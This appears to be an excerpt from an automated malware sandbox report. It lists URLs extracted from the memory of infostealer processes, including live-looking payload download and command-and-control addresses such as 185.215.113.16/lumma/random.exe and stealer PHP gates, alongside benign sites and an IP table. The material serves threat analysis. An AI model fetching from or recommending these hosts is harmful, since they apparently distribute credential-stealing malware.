https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.gstatic.cn/recaptcha/	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=UuGFpt56D9L4&l=	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/apiesO	new_v8.exe, 0000001E.00000003.3255214017.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3107929951.0000000000CD6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/apim	new_v8.exe, 0000001E.00000002.3415654770.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/off/def.exeex	3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.youtube.com	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/	new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3097027296.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/Dem7kTu/index.php6/Dem7kTu/index.php	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/Dem7kTu/index.php061101	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000009.00000003.3406068969.0000000000913000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/iS	new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743	new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076312895.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074856465.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076783994.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/D	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/U	new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/apii	new_v8.exe, 0000001E.00000003.2976296155.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975549924.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://packagednyb.cyou/apie	new_v8.exe, 0000001E.00000002.3446426303.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3108029948.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255308396.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/apila	new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/m	new_v8.exe, 0000001E.00000003.3044486078.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045770050.0000000000CC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3045435699.0000000000CBD000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/apiQ	new_v8.exe, 0000001E.00000003.3030309875.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflarekL	new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.php_~	RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://s.ytimg.com;	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/h	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255214017.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/pu	new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/a	new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3180922524.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpUsers	axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpncoded	axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#	axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.innosetup.com/	stail.exe, 00000025.00000003.3210182635.0000000002094000.00000004.00001000.00020000.00000000.sdmp, stail.exe, 00000025.00000003.3208587232.0000000002300000.00000004.00001000.00020000.00000000.sdmp, stail.tmp, 00000026.00000002.4792518335.0000000000401000.00000020.00000001.01000000.0000001B.sdmp	false	URL Reputation: safe	unknown
http://home.sevjoi17vt.top/FhmmyqGhAphHaXwiJfvm1730427912KKd	JavUmar.exe, 0000001F.00000003.3280389269.00000000016EF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.autoitscript.com/autoit3/J	splwow64.exe, 0000000B.00000003.2833312201.00000000028CA000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000003.2889206601.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 00000015.00000000.2879437391.0000000000799000.00000002.00000001.01000000.0000000E.sdmp, EcoCraft.scr, 0000001D.00000000.2909953578.0000000000179000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000023.00000002.3037130048.0000000000179000.00000002.00000001.01000000.00000010.sdmp	false		unknown
https://steamcommunity.com/profiles/76561199724331900	new_v8.exe, 0000001E.00000003.2975549924.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2976296155.0000000000C51000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw&	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwNL	new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.php	RegAsm.exe, 00000024.00000002.4842069839.0000000003FC7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.4811775554.0000000001621000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=eghn9DNyCY67&	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/r	new_v8.exe, 0000001E.00000002.3415654770.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou/p	new_v8.exe, 0000001E.00000003.3097750570.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	stail.exe, 00000025.00000000.3204671035.0000000000401000.00000020.00000001.01000000.0000001A.sdmp	false		unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/rosoft	axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.ver)	svchost.exe, 00000022.00000002.4899370728.000001D5C2200000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://ocsp.rootca1.amazontrust.com0:	new_v8.exe, 0000001E.00000003.3045023186.0000000003C41000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3660238701.00000000054F8000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://ace-snapper-privately.ngrok-free.app/test/testFailed	JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1&	new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.ecosia.org/newtab/	stealc_default2.exe, 00000007.00000003.2833417786.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3009118498.0000000003C4C000.00000004.00000800.00020000.00000000.sdmp, JavUmar.exe, 0000001F.00000003.3650241712.0000000003665000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3414104883.00000000054FC000.00000004.00000800.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3435080893.00000000054F9000.00000004.00000800.00020000.00000000.sdmp, GOLD1234.exe, 0000002C.00000003.3525441016.0000000003BCC000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://lv.queniujq.cn	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/profiles/76561199724331900/inventory/	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.youtube.com/	new_v8.exe, 0000001E.00000003.2975549924.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2961250816.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975104545.0000000000C70000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpuser	axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/lumma/random.exe	axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php1	stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php2	stealc_default2.exe, 00000007.00000002.3112251700.00000000009FE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.phpv	RegAsm.exe, 00000024.00000002.4830635244.0000000002F05000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.phpWu	axplong.exe, 00000006.00000002.4838480992.00000000012DF000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/inc/RDX123456.exe=	axplong.exe, 00000006.00000002.4838480992.0000000001305000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.phpz	RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.208.158.202/	blurayplayer32.exe, 00000027.00000002.4804225320.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, blurayplayer32.exe, 00000027.00000002.4804225320.0000000000AA6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z	axplong.exe, 00000006.00000002.4852244876.0000000001550000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.16/Jo89Ku7d/index.php1001	axplong.exe, 00000006.00000002.4838480992.0000000001363000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.google.com/recaptcha/	new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://sevjoi17vt.top/v1/upload.phpynamic	JavUmar.exe, 0000001F.00000003.3795884336.0000000001767000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://checkout.steampowered.com/	new_v8.exe, 0000001E.00000003.2974128811.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	stealc_default2.exe, 00000007.00000003.3075321770.000000002D22B000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php/	stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3047409910.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.217/CoreOPT/index.phpg	RegAsm.exe, 00000024.00000002.4830635244.0000000002F05000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.phpncoded	RegAsm.exe, 00000024.00000002.4811775554.0000000001649000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2974128811.0000000000C32000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	stealc_default2.exe, 00000007.00000002.3140672714.0000000027170000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076312895.0000000000CDB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074856465.0000000000CD8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3076783994.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3074732448.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3060630671.0000000000CC4000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3758849726.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.3783337411.0000000000D6F000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4145121508.0000000000D70000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/f1ddeb6592c03206/vcruntime140.dll6592c03206/nss3.dll	stealc_default2.exe, 00000007.00000002.3112251700.0000000000A2D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/u	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php.dll	stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.16/off/def.exe	new_v8.exe, 0000001E.00000002.3442416273.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3446426303.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3411095084.000000000097A000.00000004.00000010.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255532935.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000002.3415654770.0000000000C3F000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.3255308396.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4470400010.0000000000CAE000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000003.4353004958.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4506037697.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, 3288f0a855.exe, 00000028.00000002.4364749039.000000000055A000.00000004.00000010.00020000.00000000.sdmp	false		unknown
http://185.215.113.217/CoreOPT/index.phpj	RegAsm.exe, 00000024.00000002.4811775554.000000000166D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://packagednyb.cyou:443/apiozilla	new_v8.exe, 0000001E.00000003.3060297039.0000000000CC0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php:	stealc_default2.exe, 00000007.00000002.3112251700.0000000000AD1000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.17/2fb6c2cc8dce150a.php=	stealc_default2.exe, 00000007.00000002.3112251700.0000000000A40000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=KkhJqW2NGKiM&l=engli	new_v8.exe, 0000001E.00000003.2960789815.0000000000CB1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975053372.0000000000CB4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2959474717.0000000000CA5000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 0000001E.00000003.2975469173.0000000000CB5000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://185.215.113.36/ViewSizePreferences.SourceAumid01	Gxtuum.exe, 00000009.00000002.4813288621.00000000008E3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://html4/loose.dtd	JavUmar.exe, 0000001F.00000000.2978282515.0000000000583000.00000002.00000001.01000000.00000012.sdmp	false		unknown
https://community.cloudflare	new_v8.exe, 0000001E.00000003.2972709813.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.168.117.173	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	false
185.215.113.36	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
